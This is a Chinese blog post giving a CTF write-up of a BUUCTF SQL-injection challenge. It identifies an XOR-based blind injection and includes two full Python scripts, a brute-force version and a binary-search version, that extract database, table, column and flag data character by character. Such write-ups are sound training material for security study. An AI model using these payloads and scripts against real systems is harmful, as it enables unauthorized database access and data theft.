buuctf-颜值成绩查询(sql注入)

已于 2022-05-15 15:15:52 修改
阅读量474 收藏 2
点赞数 1
文章标签: web安全 安全
于 2022-05-15 15:03:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62094846/article/details/124777085
版权

 输入1-4都是可以的,从5开始就不存在了

多半就是sql注入,但是限制了输入的数据,就只能用报错注入或者盲注了

但尝试后发现,报错注入、布尔盲注和时间盲注都不行,都回显not exists

尝试一下异或注入

输入1^0正确,1^错误,说明是异或注入

1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))=105)^1

这是正确的结果 

错误的结果是这样的

通过这个可以最终得到flag

别人的脚本(现在还不会写)

纯爆脚本

import requests
import time
if __name__ == '__main__':
    url='http://3d4099b4-ada7-4531-b403-a98484bee6fd.node4.buuoj.cn:81/?stunum='
    result=''
    for i in range(1,500):#外循环控制位数
        for j in range(31,129):#内循环控制逻辑
            payload1='1^if(ascii(substr(database(),{},1))={},1,0)'.format(i,j)
            payload2='1^if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)="ctf"),{},1))={},1,0)'.format(i,j)
            payload3='1^if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)="flag"),{},1))={},1,0)'.format(i,j)
            payload4='1^if(ascii(substr((select(value)from(flag)),{},1))={},1,0)'.format(i,j)
            response=requests.get(url+payload4)
            print(payload4+"   "+str(response.status_code))
            time.sleep(0.1)
            if "exists" in response.text:
                result+=chr(j)
                print(result)
                break
        if j==128:
            print("All is end"+result)
            break

 二分法脚本

import requests
import time
url= 'http://3d4099b4-ada7-4531-b403-a98484bee6fd.node4.buuoj.cn:81/'

database =""

payload1 = "?stunum=1^(ascii(substr((select(database())),{},1))>{})^1" #库名为ctf
payload2 = "?stunum=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),{},1))>{})^1"#表名为flag,score
payload3 ="?stunum=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),{},1))>{})^1" #列名为flag,value
payload4 = "?stunum=1^(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))>{})^1" #
for i in range(1,10000):
    low = 32
    high = 128
    mid =(low + high) // 2
    while(low < high):
        # payload = payload1.format(i,mid)  #查库名
        # payload = payload2.format(i,mid)  #查表名
        # payload = payload3.format(i,mid)  #查列名
        payload = payload4.format(i,mid) #查flag

        new_url = url + payload
        r = requests.get(new_url)
        time.sleep(0.1)
        print(new_url)
        if "Hi admin, your score is: 100" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) //2
    if (mid == 32 or mid == 132):
        break
    database +=chr(mid)
    print(database)

print(database)

m0_62094846
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Secure-Systems-of-SQL-Injection-Attack:具有SQL注入漏洞的安全系统
05-01
恶意文本检测器,约束验证,查询长度验证和基于文本的密钥生成器是用于检测和防止SQL注入攻击访问数据库的四种过滤技术。 要求 Web应用程序 一台虚拟服务器 测试客户 封包捕获软件 执行 我们正在Ubuntu中进行此项目...
BUUCTF学习(一):SQL注入,万能密码
初尘屿风的博客
10-16 445
SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过注入的SQL语句获取数据库的敏感信息,对网站用户的数据安全造成威胁。
[WUSTCTF2020]颜值成绩查询
Yb_140的博客
11-03 131
sql盲注
BUUCTF[Web 1](SQL注入1)
夜思红尘的博客
06-22 291
这里是关于网络安全SQL注入的练习,这里SQL是一个十分危险的漏洞,因此我们要注重有关于SQL注入的防御,同时欢迎大家前来阅读!
BUUCTFSQL注入做题知识点总结
qq_49833809的博客
11-13 701
SQL做题知识点
BUUCTF WEB 颜值成绩查询
qq_41696858的博客
03-01 245
一个查询窗口,很直观的感受是SQL注入,本着这个思路,测试0,1,2,3,4,5 发现0和5都是doesn’t exists,这里就可以利用布尔盲注来进行0,1的判断,下面就是过滤字的判断 由于只是布尔判断,所以没有办法判断是单引号闭合还是双引号闭合,or和and也不能判断出来,空格被过滤了是在后面爆表名的时候判断出来的 在尝试1^1的时候发现回显doesn’t exists,那么这个payload就是没问题的,下面就是判断过程了 1^if(length(database())>0,1,0)回显doe
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
CNVD-2019-34241 SQL注入.MD
03-20
CNVD-2019-34241 SQL注入.MD
sqli-labs-master.zip sql注入的学习靶机
最新发布
01-18
sql注入的学习靶机,由于github经常挂,这里特提供大家下载。
BUUCTF:[WUSTCTF2020]颜值成绩查询
末初的CSDN博客
04-07 1498
SQL盲注 2^if(ascii(mid(database(),1,1))>0,0,1); 先fuzz测试查看有没有过滤了什么,这里过滤了空格,但是我们可以收用/**/来分隔sql语句 先看我根据我的一篇文章布尔型盲注python脚本(功能超级完整)改的脚本 import requests def ascii_str(): # 生成库名表名字符所在的字符列表字典 str_li...
buuoj WUSTCTF2020颜值成绩查询
pondzhang的专栏
04-18 367
经过测试判断为盲注,编译脚本如下: import requests #database length def get_database_length(): count = 0 while(1): url = "http://de626b0f-7c67-4a3f-b657-89451b2a9923.node3.buuoj.cn/?stunum=0^(length(...
buu-[WUSTCTF2020]颜值成绩查询
qaq517384的博客
10-08 389
[WUSTCTF2020]颜值成绩查询 报了个session的错,先不管 id输1234都有不同回显且url变为/?stunum=1,5就变成用户不存在了 ?stunum=1^0 ?stunum=1^0 可以用异或盲注 import requests url='http://3a1493b4-eefb-4eed-bb52-c5e5cfc25f91.node4.buuoj.cn:81/?stunum=' flag='' for i in range(1,100): low = 32
[WUSTCTF2020]颜值成绩查询(布尔注入)
记录学习,一起进步
01-27 695
[WUSTCTF2020]颜值成绩查询(布尔注入)
注入攻击(一)--------SQL注入(结合BUUCTF sqli-labs)
Young12138的博客
05-10 1723
为了准备信息安全技术课程汇报做的笔记,想着做了也是做了,不如分享出来给想我一样的初学者学习。本人之前没有做过CTF,也没有学过SQL注入,零基础,所以大佬可以先行离开。内容是SQL注入XPath注入HTML注入
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 3853
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
[BUUOJ][WUSTCTF2020]颜值成绩查询 ---二分法
Y4tacker的博客
08-01 7495
import requests url = "http://93b7e81c-3dd4-4eaf-9ddf-8342b4e4bc7a.node3.buuoj.cn/?stunum=" result = "" i = 0 while True: i = i + 1 head = 32 tail = 127 while head < tail: mid = (head + tail) >> 1 # payload = "
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取或者修改数据库中的数据。通常,这种漏洞主要存在于动态网页应用程序中,比如通过用户输入生成SQL查询语句的网页。攻击者可以通过在用户输入的数据中插入SQL代码,从而绕过正常的验证机制,查看、修改或者删除数据库中的数据。 为了解决注入漏洞,我们需要在编写动态网页应用程序时,对用户输入的数据进行严格的验证和过滤,避免将恶意代码传递给数据库。 对于buuctf-强网杯2019随便注这道题目,我们需要了解题目的具体要求和给定的环境,然后通过分析和尝试来找到漏洞的利用方法。可能的解题思路包括对输入的数据进行SQL注入、获取数据库中的信息或者修改数据库中的数据等等。 解决这道题目需要具备一定的网络安全知识和相关工具的使用能力。通过不断的尝试和调试,找到并利用漏洞成功获取到flag(标志),即为完成题目。 总之,buuctf-强网杯2019随便注是一道涉及注入漏洞的CTF题目,要求我们通过找到并利用漏洞来获取flag。完成这道题目需要一定的网络安全知识和技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值